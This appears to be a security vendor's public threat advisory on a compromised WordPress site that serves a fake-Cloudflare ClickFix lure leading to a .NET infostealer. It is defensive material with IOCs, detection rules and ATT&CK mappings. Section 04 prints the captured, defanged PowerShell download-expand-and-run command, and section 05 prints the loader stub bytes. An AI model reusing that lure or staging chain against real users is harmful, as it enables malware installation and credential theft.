TLP:CLEAR
SecureLeaf Threat Advisory · SL-ADV-2026-WP-001 · v14.3

Omegatech ClickFix → EtherHiding → DonutLoader
two-tier gatekeeper & dual-chain delivery (WP-002 chain)

A compromised WordPress host serves a two-component inject: an anti-analysis TDS "gatekeeper" that filters bots and researchers, and a fake-Cloudflare ClickFix that poisons the clipboard to run a PowerShell loader. This release documents an architectural evolution — dual-chain EtherHiding and triple parallel staging — over the same intrusion set.

Advisory
SL-ADV-2026-WP-001
Version
v14.3
Published
2026-08-06
Severity
9/10
Lure host
verrerie-farinelli.com
Sample
260806-babnsazfme
Attribution
Infra-level only (AS202412)
Producer
Dispensight / SecureLeaf
ClickFix v8 EtherHiding · dual-chain MZER Donut loader .NET infostealer TDS gatekeeper AS202412

01Executive summary

The legitimate French glasswork retailer verrerie-farinelli.com was compromised and injected with the Omegatech WP-002 delivery kit. Two functionally distinct components run on the page.

Component A — the "gatekeeper-troll" (TDS gate). An injected script fingerprints each visitor by user-agent, referrer and URL, silently bailing on crawlers, scanners and analysis tooling (curl · wget · python · phantomjs · ahrefs · semrush · …) and on WordPress-internal and static-asset requests. Only for apparent human visitors does it base64-decode a failover URL list and inject a next stage via synchronous XHR → document.head. This is the "troll": researchers and bots are routed to nothing (or decoys), never the live payload.

Component B — the actual ClickFix. A fake, multilingual Cloudflare "verify you are human" overlay poisons the clipboard and instructs the visitor to press Win+R, paste, and run a PowerShell one-liner. That command downloads a ZIP, expands it into C:\ProgramData\<16-hex>\, and launches the dropped loader — leading to a CLR-hosted .NET infostealer and browser-credential theft with AES socket exfiltration.

What's new in v14.0. Dual-chain EtherHiding (Polygon-mainnet and BSC-testnet), three parallel staging channels on one page (gate-XHR, WebSocket, web3), an AES-GCM-encrypted victim-telemetry beacon, and a ZIP-drop ClickFix variant. The loader family, imphash pivots and post-exploitation chain are unchanged — same actor, evolved delivery.

v14.1 changelog. Binary-level re-verification of the dropped stages (sample 260806): MZER header + GetPC stub confirmed at offset 0 on both branches → wildcarded 26-byte code-anchor; DLL side-loading vector identified (legit LockScreenContentServer.exe + malicious dui70.dll); inherited imphash pivots found stale against the ZIP PEs and flagged for re-base; new IOCs added.
v14.3 changelog. Runtime confirmation (VT Jujubox): CLR-hosted .NET stealer with legacy-CryptoAPI AES over Winsock raw socket; native WinHTTP std_enterprise stage (hash 6270f38b…); both stages use dynamic API resolution (T1027.007/T1106), corroborating the imphash re-base; LockScreenContentServer.exe disassembly confirms clean side-load bait. Adds Sigma + AbuseIPDB companions.
v14.3 changelog. Memory forensics of the injected svchost (PID 3032): new stealer capabilities confirmed — screen capture (Graphics.CopyFromScreen) and WMI recon (SWbemLocator); AES-over-raw-TCP exfil pinned to managed AesManaged/TcpClient/NetworkStream. Adds T1113/T1047, an in-memory YARA rule, and a screen-capture/WMI Sigma rule. False-positive browser list retracted.

02Attack chain

1
Drive-by on compromised WordPress host
verrerie-farinelli.com (FR, 164.132.235.17) serves the injected gate + ClickFix. Lure host — never blocklisted (splitcam rule).
2
Gatekeeper-troll — TDS / anti-analysis filter
UA / referrer / URL checks. Real humans → staged via synchronous XHR to dntds[.]shop/teamrepo. Bots & analysts → nothing / decoy.
Parallel staging channels (any can deliver)
  • Gate XHR → hxxps://dntds[.]shop/teamrepo (backup sdntds[.]shop)
  • WebSocket C2 → wss://ssl.guardhub[.]info/storage → blob → new Function()
  • EtherHiding (dual-chain) → on-chain read via Polygon-mainnet and BSC-testnet public RPC
3
ClickFix overlay — clipboard poisoning
Fake multilingual Cloudflare "verify you are human"; spoofed Ray ID; Win+R paste-run social engineering. Encrypted telemetry beacon → enter-pverif-code[.]info/api.php.
4
PowerShell downloader
Fetches verify_pkg.zip from admetricslab[.]org/get_verify (or student_s.bin from the /std host), expands to C:\ProgramData\<16-hex>\, runs 1.bat → LockScreenContentServer.exe.
5
MZER Donut loader (CLR-hosting)
MZER polyglot header (4D 5A 45 52) masquerading as PE. In-memory .NET compile observed (powershell → csc.exe → cvtres.exe). Per-victim recompile churns SHA-256; imphash is the durable pivot.
6
.NET infostealer → injection → exfil
Reflective assembly load; CPFATP_ CLR-profiler abuse; remote-thread injection into svchost.exe; browser-credential theft; AES over a raw socket to 158.94.208.92:61120.
7
Persistence
HKCU Run key + 60-minute Scheduled Task, both named LockScreenContentServer_<8char>.

03Version rationale — why v14.0

Prior v13.x point-releases tracked new detonation waves and infrastructure rotation within one delivery architecture. This sample changes the architecture, so it earns a major bump.

AxisWP-002 rev.4 / v13.xv14.0 (this sample)
EtherHiding chainsBSC-testnet onlyBSC-testnet + Polygon-mainnet (dual)
Staging channelsSingle pathGate-XHR + WebSocket + web3 (triple)
Telemetry beaconPlaintext / n/aAES-GCM (WebCrypto) to enter-pverif-code[.]info
ClickFix deliveryDirect .bin fetchZIP-drop (fetch → Expand-Archive → run)
Loader family / imphashUnchanged — MZER Donut loader; durable imphash pivots
Post-exploitationUnchanged — reflective .NET infostealer, AES socket exfil, LockScreenContentServer persistence
AttributionUnchanged — infrastructure-level only, AS202412

Decision: same intrusion set & campaign, materially evolved TTPs → v14.0 under WP-001 (not a new series). v13.2 remains defensible if a single continuous IOC thread is preferred.

04Captured lure — the actual ClickFix

The clipboard payload delivered to targeted (non-analyst) visitors. Reproduced defanged and annotated as evidence; the live download URL is neutralised so this block is not directly runnable.

clickfix-lure-tds.txt · captured 2026-08-06 · clipboard (PowerShell)TLP:CLEAR · defanged
# fake progress banner — social-engineering theatre
cls; Write-Host "[hh:mm:ss] Starting Cloudflare verification..." # cosmetic
$url = 'hxxps://admetricslab[.]org/get_verify?i=16357'   # ZIP delivery host
$zip = "$env:TEMP\verify_pkg.zip"
$dest = 'C:\ProgramData\<16-hex>'                      # e.g. 2cfadd1cff65ff82
New-Object Net.WebClient + spoofed browser User-Agent → DownloadFile($url,$zip)
# if the fetch succeeds, prints "[OK] CloudFlare Services respond"
Expand-Archive $zip -DestinationPath $dest -Force
cmd /c "`"$dest\1.bat`" `"$dest\LockScreenContentServer.exe`" >nul 2>&1 &"
Write-Host "I am not a robot - Cloudflare ID: <16-hex>"       # fake reassurance
Analyst note. The "Cloudflare ID" and 16-hex string are cosmetic and also reused as the ProgramData folder name; they vary per victim/run and are not a stable IOC on their own. The stable anchors are get_verify?i=, verify_pkg.zip, Expand-Archive and LockScreenContentServer.exe (see YARA rule SL_WP001_v14_ClickFix_PowerShell_Lure).

05Binary confirmation — .bin stages (v14.3)

Disassembly of student_s.bin and the std_enterprise stage confirms the MZER polyglot at the byte level on both branches. The two branches are identical through the stub except for a single byte — the high byte of the add rax displacement.

MZER header + GetPC self-locating stub · annotated · non-runnablecode-anchor
4D 5A 45 52            'MZER'  (MZ-lookalike header at offset 0)
E8 00 00 00 00         call $+5            ; GetPC
59                     pop rcx             ; rcx = RIP
48 83 E9 09            sub rcx, 9          ; rcx -> base of MZER
48 8B C1               mov rax, rcx
48 05 ?? ?? ?? ??      add rax, <imm32>    ; student=0x0004C000 · std=0x0000C000
FF D0                  call rax            ; enter real stage
C3                     ret
# YARA code-anchor (1 wildcard @ offset 21 covers both branches):
{ 4D 5A 45 52 E8 00 00 00 00 59 48 83 E9 09 48 8B C1 48 05 00 C0 ?? 00 FF D0 C3 }

Dropped package — DLL side-loading (T1574.002)

verify_pkg.zip drops three files. The EXE is a legitimate DUI-host binary used as bait; the malicious code rides in the co-located dui70.dll.

FileSHA-256 / imphashAssessment
LockScreenContentServer.exede9d325a… · imphash e441628266…Legit DUI-host EXE (sideload bait). Matches known hash.
dui70.dll1a8a1673… · imphash b7b21f8a…malicious sideload DLL — rotated build
1.bathash varies (suffix)Persistence installer; suffix JQZK2HgoM this build — not a stable IOC
verify_pkg.zip924906ab…Delivery package (whole)
Imphash re-base required. The inherited pivots (8e7b065c downloader, edc8ef44 loader) match neither ZIP PE — they fingerprint a different stage (assessed: the donut-embedded .NET module). Treat them as stage-scoped, not generic. The durable, binary-confirmed pivot for the .bin stages is the MZER GetPC code-anchor above.

Runtime behavioral profile (VT Jujubox)

Detonation of both stages resolves what the static disassembly hid — and both resolve their socket and crypto APIs dynamically via GetProcAddress (T1027.007 / T1106), which is precisely why the ZIP-PE static imphashes never fingerprinted the malicious surface.

StageRuntime-confirmed behaviour
student_s
.NET stealer
Hosts the CLR in-process (loads both v2.0.50727 and v4.0.30319 clr.dll) = reflective .NET. AES via legacy CryptoAPI (CryptAcquireContext → CryptGenKey/CryptImportKey/CryptExportKey/CryptEncrypt, CryptGenRandom IV, CryptHashData). Exfil over Winsock raw socket (ws2_32/wsock32 WSAConnect/send/recv, wship6).
std_enterprise
native
Native WinHTTP downloader/injector. Winsock (WSAConnect/WSAStringToAddressW/WSASend/WSARecv, mswsock/wshtcpip); proxy-aware via Internet Settings\Connections. Sample SHA-256 6270f38b….
Clean-bait confirmation. Disassembly of LockScreenContentServer.exe shows a normal MSVC PE (int3 padding, standard mov/call/lea, xor-reg zeroing) with no syscall, rdtsc/cpuid anti-analysis, RWX self-modification, or decode-stub. It is a legitimate DUI-host binary used purely as side-load bait — all malice rides in dui70.dll. This strengthens, rather than changes, the T1574.002 assessment.
Not captured (honest). The sandbox logged the stealer preparing the socket + AES but not the actual connect() target or a plaintext key blob, and did not surface the reflected assembly name. The EtherHiding contract remains browser-side and absent here.

Memory forensics — injected .NET stealer (v14.3)

The injected svchost (PID 3032) region of the memdump carries the reflectively-loaded stealer. These managed types are present only in the injected svchost (a clean service host does not host them), so they are attributable to the stealer:

CapabilityMemory evidence (svchost-only)
AES over raw TCP exfilAesManaged + TcpClient + NetworkStream + System.Net.Sockets
Screen capture newSystem.Drawing + Graphics.CopyFromScreen + Bitmap
WMI system recon newWbemScripting.SWbemLocator
Reflective loadSystem.Reflection · <Module>
Retracted false positives (forensic honesty). An apparent browser-target list (Opera/Edge/Firefox) proved to be ASP.NET AJAX framework noise (Sys.Browser.*) resident in the PowerShell process, not the stealer; Clipboard references were PSReadLine (absent from svchost). No keylogger observed (GetAsyncKeyState absent). Not recovered from these 29 regions: EtherHiding contract addresses (browser-side), the C2 host:port literal, and the AES key.

06Indicators of compromise

Network — actor infrastructure

IndicatorResolves / portGeoRole
enter-pverif-code[.]info178.16.52.101DETDS AES-GCM telemetry beacon /api.php
dntds[.]shop / sdntds[.]shop178.16.53.137NLTDS gate failover stage fetcher /teamrepo
ssl.guardhub[.]info104.21.89.168CFC2 WebSocket channel wss://…/storage
admetricslab[.]org91.236.230.87—STAGE ClickFix ZIP drop /get_verify
senterprise2026[.]com158.94.211.92—STAGE /std branch; /enterprise/student_s.bin
— (raw socket)158.94.208.92:61120—C2 AES socket exfil (.NET infostealer)
viewpublicdocuments[.]com194.213.18.38—TDS decoy / redirect hop
www.letsdiskuss[.]com104.21.20.139—TDS decoy / redirect hop

Network — informational (do not blocklist)

IndicatorRoleHandling
verrerie-farinelli.com · 164.132.235.17Compromised legitimate lure hostsplitcam — document, never block
bsc-testnet-rpc.publicnode.com · bsc-testnet.bnbchain.orgEtherHiding read (BSC-testnet)informational
rpc-mainnet.matic.quiknode.pro · polygon.drpc.org · polygon-mainnet.public.blastapi.io · polygon.gateway.tenderly.coEtherHiding read (Polygon-mainnet)informational
www.verrerie-farinelli.frSibling lure host (.fr) — observed in 260806 PCAPsplitcam — document, never block

Host artifacts

ArtifactValue
LockScreenContentServer.exe SHA-256de9d325af3156232c34916840210efb5706d6e6a5eba1827c8240e4f71c09fa2
1.bat SHA-256326525551d91ae03ee6a8e2ec829596d3edf715eb26349b1f3b00e52024ce3c1
dui70.dll (malicious sideload, v14.3) SHA-2561a8a1673fb406038cd77e647377b26041c69eb74223ab347ecdb279f1bdcee14
verify_pkg.zip (package) SHA-256924906ab163fd434abe72d48b1eb20963415f5598134eb0223c8dee1dadca2f6
std_enterprise native stage SHA-2566270f38bdf27aebb108331a484220a8bc0b9a1e6a2c4bba6dad89a2f3665bca5
DUI70.dll (prior build) SHA-2568e19bd310054500eb7e8aa4a64a7adefa3f066296f436b67a9c0972421706ff1
Drop directoryC:\ProgramData\<16-hex>\   (obs. 0968f8a2718d9783, 2cfadd1cff65ff82)
Staging ZIP%TEMP%\verify_pkg.zip
Run keyHKCU\...\CurrentVersion\Run\LockScreenContentServer_<8char>
Scheduled taskLockScreenContentServer_<8char>  (/sc minute /mo 60)
Named pipesCPFATP_*  (COR_PROFILER / CLR-profiler abuse)
In-memory compilepowershell.exe → csc.exe → cvtres.exe
Beacon key (api.php)8402fb1338daab6a166e91aa8c92a20798acfa98fb75c5a2

07Reporting trust tiers — handling before you report

Indicators below are split by how they should be reported, to prevent mis-reporting shared or victim infrastructure. Evidence tier: direct = decoded from a lure or observed serving a payload; in-chain = observed in detonation traffic alongside the confirmed chain, role inferred.

Tier 1 — Confirmed actor infrastructure (safe to report by IP)

DomainIPRoleEvidence
enter-pverif-code[.]info178.16.52.101AES-GCM telemetry beacon /api.phpdirect
dntds[.]shop178.16.53.137TDS stage fetcher /teamrepodirect
sdntds[.]shop—Failover of the abovedirect
admetricslab[.]org91.236.230.87ClickFix ZIP drop /get_verifydirect
senterprise2026[.]com158.94.211.92/std stage host; served student_s.bindirect
— (raw socket)158.94.208.92:61120Raw AES socket C2 exfildirect
viewpublicdocuments[.]com194.213.18.38TDS / redirect hopin-chain
Report as: AbuseIPDB by IP (see companion CSV), URLhaus/registrar abuse by domain. The six Tier-1 IPs are exactly those in …-v14.3.abuseipdb.csv. Footnote viewpublicdocuments[.]com as "observed in-chain, role inferred" for maximum defensibility.

Tier 2 — Actor domains on shared hosting (report the DOMAIN only, never the IP)

DomainResolves toRoleHandling
ssl.guardhub[.]info104.21.89.168 (Cloudflare)WebSocket C2 wss://…/storagedomain-only
www.letsdiskuss[.]com104.21.20.139 (Cloudflare)TDS / redirect hop in-chaindomain-only
Do not report these IPs. They are shared Cloudflare edge addresses; an AbuseIPDB IP report would flag innocent co-tenants. Report the domains to the registrar / Cloudflare abuse and URLhaus, and detect on SNI/host, not on 104.21.x. This is why they are excluded from the IP CSV.

Tier 3 — Do NOT report (victim or abused-legitimate)

IndicatorNatureHandling
verrerie-farinelli.com · www.verrerie-farinelli.fr
164.132.235.17
Compromised legitimate WordPress host (victim)notify owner · never blocklist (splitcam)
bsc-testnet-rpc.publicnode.com · bsc-testnet.bnbchain.orgLegitimate BSC-testnet RPC (abused for EtherHiding read)informational
rpc-mainnet.matic.quiknode.pro · polygon.drpc.org · polygon-mainnet.public.blastapi.io · polygon.gateway.tenderly.co · 1rpc.io · polygon-public.nodies.app · polygon-bor-rpc.publicnode.com · rpc.ankr.comLegitimate Polygon-mainnet RPC (abused for EtherHiding read)informational
Never blocklist Tier 3. The lure hosts are victims — notify the site owner. The RPC endpoints are public blockchain infrastructure used by countless legitimate applications; blocking them causes collateral damage and does not disrupt the actor (who can swap to any of dozens of providers).

08Detection guidance

Companion files ship with this advisory: …-v14.3.yar (11 YARA rules), …-v14.3.sigma.yml (5 behavioral rules), …-v14.3.stix.json (STIX 2.1), and …-v14.3.abuseipdb.csv — all TLP:CLEAR.

YARA ruleTargets
SL_WP001_v14_TDS_GatekeeperGate: bot-UA filter + sync-XHR → head injection
SL_WP001_v14_Beacon_ApiPhpAES-GCM telemetry beacon (api.php) + beacon key
SL_WP001_v14_ClickFix_FakeCloudflareFake-Cloudflare verify UI (checkbox-verify, Ray ID, Win+R)
SL_WP001_v14_WebSocket_LoaderWebSocket stager (guardhub, blob → new Function)
SL_WP001_v14_EtherHiding_DualChainPolygon + BSC-testnet RPC pool / eth_call read
SL_WP001_v14_ClickFix_PowerShell_LureCaptured clipboard PowerShell (ZIP-drop chain)
SL_WP001_v14_Host_PersistenceProgramData 16-hex dir + LockScreenContentServer + 1.bat
SL_WP001_v14_Injected_Obfuscation_IdiomVariant-resilient inject idioms (catches string-encrypted pages)
SL_WP001_v14_MZER_GetPC_CodeAnchor26-byte MZER header + GetPC stub (1 wildcard, both branches)
SL_WP001_v14_ClickFix_Widget_ModuleServer-templated fake-Turnstile widget (REPLACE_SERVER, cfm-cb/ray)
Behavioural hunts. powershell.exe spawning csc.exe/cvtres.exe; Expand-Archive into C:\ProgramData\<16-hex>\; Run-key/Task pairs named LockScreenContentServer_*; outbound to :61120 on a non-standard TCP socket; process handles to CPFATP_* named pipes; browser processes reading credential stores immediately before the 158.94.208.92 connection.
Coverage limit. The fresh sample's gate/ClickFix logic is fully obfuscator.io string-encrypted (RC4), so string rules alone under-match it — the idiom rule and the network/imphash pivots are the durable detection surface for encrypted variants. On-chain EtherHiding contract addresses were not recoverable from the supplied artifacts without executing the encrypted web3 client, and were absent from the provided PowerShell/svchost memory regions.

09MITRE ATT&CK (Enterprise v16)

TacticTechniqueID
Initial AccessDrive-by CompromiseT1189
ExecutionUser Execution: Malicious Copy & PasteT1204.004
ExecutionPowerShell · Windows Command ShellT1059.001 · .003
Persistence / Priv-EscRegistry Run Keys · Scheduled TaskT1547.001 · T1053.005
Defense EvasionObfuscated Files/Info · Modify RegistryT1027 · T1112
Defense EvasionReflective Code Loading · Process InjectionT1620 · T1055
Persistence / Priv-EscHijack Execution Flow: DLL Side-LoadingT1574.002
Defense Evasion / ExecutionDynamic API Resolution · Native APIT1027.007 · T1106
Defense EvasionVirtualization/Sandbox Evasion (the gate)T1497
Command & ControlWeb Service (EtherHiding via public RPC)T1102
Command & ControlEncrypted Channel · Non-Standard PortT1573 · T1571
Credential AccessCredentials from Web BrowsersT1555.003
DiscoveryBrowser Info · System Info · System TimeT1217 · T1082 · T1124
Collection / DiscoveryScreen Capture · Windows Management InstrumentationT1113 · T1047

10Attribution & handling

Activity is assessed at the infrastructure level only: an unattributed cluster operating on AS202412 ("Omegatech") infrastructure. No named-actor or nation-state assertion is made. Confidence is calibrated to observed artifacts (sandbox behavioral report, PCAP, page captures, process-memory regions).

Handling: TLP:CLEAR — public defensive analysis, freely shareable. Compromised lure hosts and abused public RPC endpoints are documented but excluded from blocklists. Live download URLs are defanged throughout. No payload code, deobfuscated loader, or runnable command is reproduced.